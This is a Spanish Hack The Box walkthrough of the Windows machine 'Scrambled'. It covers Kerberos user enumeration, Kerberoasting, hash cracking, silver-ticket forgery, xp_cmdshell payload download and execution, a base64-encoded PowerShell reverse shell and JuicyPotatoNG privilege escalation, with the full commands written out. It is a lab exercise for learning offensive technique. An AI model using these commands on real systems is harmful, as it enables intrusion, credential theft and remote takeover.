🟨HTB - Scrambled

https://app.hackthebox.com/machines/Scrambled

Información General

• Nombre de la Máquina: Scrambled

• IP de la Máquina: 10.129.85.148

• Sistema Operativo: Windows

• Dificultad: Medium

• Fecha de Publicación: 11 Jun 2022

---

Enumeration

Ping para obtener ruta de retorno

Realizamos un ping a la máquina objetivo para verificar la conectividad y obtener información sobre la ruta utilizando la opción -R para incluir la ruta de retorno:

Kali Linux Machine

ping -c 1 10.129.85.148 -R

El valor de TTL (Time To Live) igual a 127 puede ser indicativo de que el sistema operativo de la máquina objetivo es Windows. El TTL es un valor en el campo de los paquetes IP que indica la duración que un paquete puede estar en una red antes de ser descartado. Windows establece por defecto el valor de TTL de sus paquetes IP en 128, que al pasar por un salto en la red se decrementa a 127.

Escaneo de puertos con Nmap

Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la máquina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mínima de paquetes y -vvv para un nivel de verbosidad alto. Además, utilizamos -n para desactivar la resolución de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable para luego utilizar nuestra función extractPorts:

Kali Linux Machine

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.85.148 -oG allPorts
extractPorts allPorts

Escaneo detallado con Nmap

Posteriormente, realizamos un escaneo más detallado de los puertos identificados utilizando la opción -sCV para detección de versiones y scripts de enumeración de servicios. Específicamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:

Kali Linux Machine

sudo nmap -sCV -pPORTS 10.129.85.148 -oN targeted

# Nmap 7.94SVN scan initiated Tue Apr  2 18:15:21 2024 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49699,49704,60649 -sCV -oN targeted 10.129.85.148
Nmap scan report for 10.129.85.148
Host is up (0.20s latency).

Bug in ms-sql-ntlm-info: no string output.
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-02 22:15:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.85.148:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-02T21:44:08
|_Not valid after:  2054-04-02T21:44:08
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
|_ssl-date: 2024-04-02T22:18:47+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-02T22:18:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T01:42:36
|_Not valid after:  2023-06-09T01:42:36
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
60649/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/2%Time=660C8380%P=x86_64-pc-linux-gnu%r(
SF:NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORD
SF:ERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBL
SF:ECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDER
SF:S_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNK
SF:NOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r
SF:\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(T
SF:LSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V
SF:1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Fou
SF:rOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMA
SF:ND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOW
SF:N_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDe
SF:sk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRA
SF:MBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,
SF:"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLEC
SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-02T22:18:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  2 18:18:50 2024 -- 1 IP address (1 host up) scanned in 208.81 seconds

Modificando /etc/hosts

Para añadir la entrada "10.129.85.148 scrm.local" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:

Kali Linux Machine

echo "10.129.85.148 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts

Username Bruteforce con Kerbrute

Kali Linux Machine

kerbrute userenum --dc dc1.scrm.local -d scrm.local -t 2000 /usr/share/seclists/Usernames/xato-net-10-milion-usernames.txt -o users

Directory Bruteforce con Dirsearch

Kali Linux Machine

dirsearch -u scrm.local

Analizando la pagina de scrm.local

http://scrm.local/supportrequest.html
http://scrm.local/newuser.html
http://scrm.local/salesorders.html
http://scrm.local/passwords.html

En passwords.html podemos ver que dice que la password to be the same as the username. Así que intentaré nuevamente con kerbrute para ver si la credencial que obtuve funciona.

Password Bruteforce con Kerbrute

Kali Linux Machine

kerbrute passwordspray -d scrm.local --dc dc1.scrm.local users ksimpson

Impacket

Ya tenemos un usuario valido, por lo que seguiremos con la enumeración con impacket

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Partimos con getTGT.py

Kali Linux Machine

python3 getTGT.py scrm.local/ksimpson:ksimpson

export KRB5CCNAME=ksimpson.ccache
klist

sudo apt-get install krb5-user

Si notas que no funciona klist, instala kerberos.

Lo siguiente es utilizar GetUserSPNs.py

Kali Linux Machine

python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass

Kali Linux Machine

python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -no-pass -request

hash.txt

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$05ba11933eb6ee366b244a4aa5faeb53$e35b1fe2314f990d3cff75cd40699be6b20df36fea2e9f15e798b57cf8777ead1ba18ec589a9052eac681dbffc8b8a7ecd81b108f5d9ba72e720356247556ef08cd784830cc0a7bbde00e1923b1886de69ed32f4d5ddac664eb055787089f5985d24cdd402969596215f35caf206a999c7648b7228bac182a5d32a90a1c003a85fe878c9eb801644ec1dbace86df05713a103fa3e153c4361f0bbc8b50e7cbf14391dc20985449a669cf2ac3a9a0c66a7248b9353a272a4db5c57764cbed74ce74fc7427d78f984b68a623336526bdd7695adf385a30d3ee3b2bc354ed92f36268b6b170ded9239d1b43fba70a01ed730bbb5e45000a5d6999cf7d9426ed704302372b4ecc6fd8e96343b128cdfaf0931b7545f0cd8439d78ef20eeea164eb2f86a390277024aa53b421a57e3a214caf63733dc73fa3195fea3ad117dce2dc6e6204b9885b7768af1cb2c1beed8cf0a06ccd71f2f9ae57c09fabbb9167c04e072a6ad3002fb08417cf8704847519b56a859b7ac8d51fc4d5b38608dc7c9aeef11f6e1c8751e3a1434e5b032a07ec5caa2703e0469fecbf75ecd0d8d6b4f197c06873b451ad5d2beb12e0c4a19dae3ce3bf47113e447793638c6445924ea69cec0e2a2d4c98a25575251494e056bab0c753746d0ff611f0391acea24756372a17632e4f8094166f4c01f1cd982179358dc70415195aec5e5bc628a4dd3a1662c62d8ae70218508c98b433362388ce7cf9dd0a787e6694cc08b9576b342929f3c7be2a633cd37cedb82c1649b0e93d1799789b2736c2dca7938b82ccbe4b272af5a5ef4c8b6a918c141152a3b953dc025e737c7d756cbad510e51a11d57148647b2cf5f2d314701758a1da79dd08ef6fddccaa999f7a4457831e552f762a90cd4e7456f685aed9e352dd77f528e0694b16136f06e5b29f9f5f8f60cb3b5e2bdd765b0af23cdf2a3c7f68578eb2b9efdf333eadf27def6e43a80474ee79dfd3ea7f42f9990b194f5b97ef6de67fa67d2ef542105a89b20e0f65b707d42151a40eaa14e5d350a3cb71d068e327c8f8d74af8aae5b192198daa723d4cbfeadb27dd311f3b36de412ba87b22ec96e6c35ed3b1b8a11412e34ec2b3cba7103a9f9c3250f8d7cbb10871a42483d2945458a7fbf8482652081dd8a7edd97f1d1c7ea9e3c21764ba2ea728c31c92e6a7d923873da8aa2180d999a973f1e6e1ee49d606f4e45184aabe5232427e986bd2906ee73173bf2862193f60e551c2e423e78495f5cf812b128fd8f6be5f354925add8d48234b868f7cfb56cf902d5cab2a6a92203547ff7e90260dcb461bd6dd1b1a5b5630e034e0ae63b26368852de50a413e9ffc6f0ee185a04289530c90a025f67b9214989dc2fc5a71f046f2fa84e4e06d8efee5bab82940517686e10df2fed6c5a2faa7ea103a3ce7b29453f3204

John the ripper para crackear el hash

Kali Linux Machine

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

~/Scrambled/creds.txt

ksimpson:ksimpson
sqlsvc:Pegasus60:MSSQLSvc/dc1.scrm.local

Kali Linux Machine

python3 mssqlclient.py dc1.scrm.local -k

Por lo que intentaremos todo de nuevo (desde getTGT.py) pero ahora con las credenciales sqlsvc:Pegasus60.

Kali Linux Machine

python3 getTGT.py scrm.local/sqlsvc:Pegasus60
export KRB5CCNAME=sqlsvc.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k

NTLM Hash

Convertimos "Pegasus60" a NTLM Hash con alguna herramienta online (browserling.com/tools/ntlm-hash)

Pegasus60:b999a16500b87d17ec7f2e2a68778f05

Y la agregamos a nuestra lista de credenciales en creds.txt

getPac.py

Kali Linux Machine

python3 getPac.py -targetUser Administrator scrm.local/ksimpson:ksimpson

getPac.py output

Impacket v0.11.0 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   3436097167 
    dwHighDateTime:                  31098182 
LogoffTime:                     
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
KickOffTime:                    
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
PasswordLastSet:                
    dwLowDateTime:                   2585823167 
    dwHighDateTime:                  30921784 
PasswordCanChange:              
    dwLowDateTime:                   3297396671 
    dwHighDateTime:                  30921985 
PasswordMustChange:             
    dwLowDateTime:                   4294967295 
    dwHighDateTime:                  2147483647 
EffectiveName:                   'administrator' 
FullName:                        '' 
LogonScript:                     '' 
ProfilePath:                     '' 
HomeDirectory:                   '' 
HomeDirectoryDrive:              '' 
LogonCount:                      259 
BadPasswordCount:                0 

PrimaryGroupId:                  513 
GroupCount:                      5 
GroupIds:                       
    [
         
        RelativeId:                      513 
        Attributes:                      7 ,
         
        RelativeId:                      512 
        Attributes:                      7 ,
         
        RelativeId:                      520 
        Attributes:                      7 ,
         
        RelativeId:                      518 
        Attributes:                      7 ,
         
        RelativeId:                      519 
        Attributes:                      7 ,
    ] 
UserFlags:                       544 
UserSessionKey:                 
    Data:                            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' 
LogonServer:                     'DC1' 
LogonDomainName:                 'SCRM' 
LogonDomainId:                  
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
LMKey:                           b'\x00\x00\x00\x00\x00\x00\x00\x00' 
UserAccountControl:              16912 
SubAuthStatus:                   0 
LastSuccessfulILogon:           
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
LastFailedILogon:               
    dwLowDateTime:                   0 
    dwHighDateTime:                  0 
FailedILogonCount:               0 
Reserved3:                       0 
SidCount:                        1 
ExtraSids:                      
    [
         
        Sid:                            
            Revision:                        1 
            SubAuthorityCount:               1 
            IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x12' 
            SubAuthority:                   
                [
                     2,
                ] 
        Attributes:                      7 ,
    ] 
ResourceGroupDomainSid:         
    Revision:                        1 
    SubAuthorityCount:               4 
    IdentifierAuthority:             b'\x00\x00\x00\x00\x00\x05' 
    SubAuthority:                   
        [
             21,
             2743207045,
             1827831105,
             2542523200,
        ] 
ResourceGroupCount:              1 
ResourceGroupIds:               
    [
         
        RelativeId:                      572 
        Attributes:                      536870919 ,
    ] 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

 0000   10 00 00 00 ED F9 BD 22  BE 45 B3 80 6A 22 04 A4   .......".E..j"..

Guardamos el Domain SID en nuestras lista de credenciales:

LDAP Search

Kali Linux Machine

ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL'  | grep -i sid

Script base64SID to String

tosid.py

import struct, base64, sys

def o(b):return struct.unpack('B', b[0:1])[0],struct.unpack('B', b[1:2])[0],struct.unpack('>Q', b'\x00\x00'+b[2:8])[0]
def p(b, l):return [struct.unpack('<L', b[8+4*i:12+4*i])[0] for i in range(l)]
def q(v, a, s):return f"S-{v}-{a}"+''.join([f'-{x}' for x in s])
def r(s):v,l,a=o(s);assert v==1;return q(v,a,p(s,l))
def s(i=None):
    if i is None:i=sys.argv[1] if len(sys.argv) > 1 else exit("Uso: python3 tosid.py base64SID")
    try:print(f"SID decodificado: {r(base64.b64decode(i))}")
    except Exception as e:print(f"Error: {e}")
if __name__ == "__main__":s()

Kali Linux Machine

python3 tosid.py AQUAAAAAAAUVAAAAhQSCo0F98mxA04uXVAYAAA==

Kali Linux Machine

grep S-1-5-21-2743207045-1827831105-2542523200 creds.txt

Kali Linux Machine

ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL'  | less
ksimpson

ticketer.py

Kali Linux Machine

python3 ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local

Kali Linux Machine

export KRB5CCNAME=Administrator.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k

Extracción de credencial en DB

SELECT name FROM sys.databases;
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.UserImport;

MiscSvc:ScrambledEggs9900
sqlsvc:Pegasus60
ksimpson:ksimpson

MSFVenom Reverse Shell

SQL Session

xp_cmdshell curl 10.10.15.21:8888/3434.exe -o %temp%\3434.exe
xp_cmdshell %temp%\3434.exe

Kali Linux Machine

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3434 -f exe -o 3434.exe
python3 -m http.server 8888

Kali Linux Machine

nc -lvnp 7777

Entonces nos damos cuenta que el privilegio SeImpersonatePrivilege esta Enabled

Lo que quiere decir que podemos efectuar una escala de privilegios con JuicyPotatoNG

Escala de privilegios con JuicyPotatoNG

Windows Machine

cd %programdata%
curl 10.10.15.21:8888/JuicyPotatoNG.exe -o JuicyPotatoNG.exe

Kali Linux Machine

python3 -m http.server 8888

Utilizaremos la shell Invoke-PowrShellTcpOneLine.ps1, la modificaremos (el LHOST y LPORT) y luego la dejaremos en base64. Para luego descargarla en la máquina Windows en %programdata%.

Kali Linux Maquine

$client = New-Object System.Net.Sockets.TCPClient('10.10.15.21',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 .-w 0

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA1AC4AMgAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=% 

t.bat

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA1AC4AMgAxACcALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=% 

Windows Machine

cd %programdata%
curl 10.10.15.21:8888/t.bat -o t.bat
powershell
.\JuicyPotatoNG.exe -t * -p C:\ProgramData\t.bat

Kali Linux Machine

nc -nvlp 6666